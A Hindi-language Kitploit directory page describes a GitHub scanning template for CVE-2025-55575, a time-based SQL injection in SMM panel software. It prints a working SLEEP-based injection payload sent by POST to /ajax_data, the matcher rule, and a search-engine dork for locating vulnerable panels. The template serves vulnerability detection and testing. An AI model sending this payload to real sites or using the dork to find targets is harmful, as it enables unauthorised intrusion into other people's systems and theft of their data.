Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55575 — SMM पैनल के लिए समय-आधारित SQL इंजेक्शन का पता लगाने का टेम्पलेट। `/ajax_data` पर तैयार किए गए POST अनुरोध भेजता है और प्रतिक्रिया विलंब विश्लेषण के माध्यम से कमजोर एंडपॉइंट्स की पहचान करता है। | Kitploit
उपकरण/GitHubGitHub/aether-0/cve-2025-55575
भेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubaether-0/cve-2025-55575

CVE-2025-55575

SMM पैनल के लिए समय-आधारित SQL इंजेक्शन का पता लगाने का टेम्पलेट। `/ajax_data` पर तैयार किए गए POST अनुरोध भेजता है और प्रतिक्रिया विलंब विश्लेषण के माध्यम से कमजोर एंडपॉइंट्स की पहचान करता है।

रिपॉजिटरी देखें
0 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

smm-panel-sqli(CVE-2025-55575)

SMM पैनल के लिए समय-आधारित SQL इंजेक्शन पहचान


अवलोकन

यह टेम्पलेट, /ajax_data पर HTTP POST अनुरोधों के माध्यम से SMM पैनल के service_detail पैरामीटर में समय-आधारित SQL इंजेक्शन कमज़ोरी का पता लगाता है। इसका दुरुपयोग करके रिमोट हमलावर संवेदनशील डेटा तक पहुँच प्राप्त कर सकते हैं या विशेषाधिकार बढ़ा सकते हैं।

  • लेखक: Aether
  • गंभीरता: गंभीर
  • टैग: sqli, mysql, timing, dork:'intitle:"#1 SMM Panel ****"' "smm panel"
  • संदर्भ: https://owasp.org/www-community/attacks/SQL_Injection

पहचान तर्क

उपकरण एक तैयार POST अनुरोध भेजता है:

root@kitploit:~
POST /ajax_data
Content-Type: application/x-www-form-urlencoded

action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z

यदि प्रतिक्रिया समय 5 सेकंड से अधिक है, तो यह एक संवेदनशील एंडपॉइंट को इंगित करता है।

पहचान उदाहरण

root@kitploit:~
- Method: POST
- Path: {{BaseURL}}/ajax_data
- Headers: Content-Type: application/x-www-form-urlencoded
- Body: action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
- Matcher: duration > 5 seconds

वीडियो डेमो

SQLi PoC


टूल डाउनलोड करें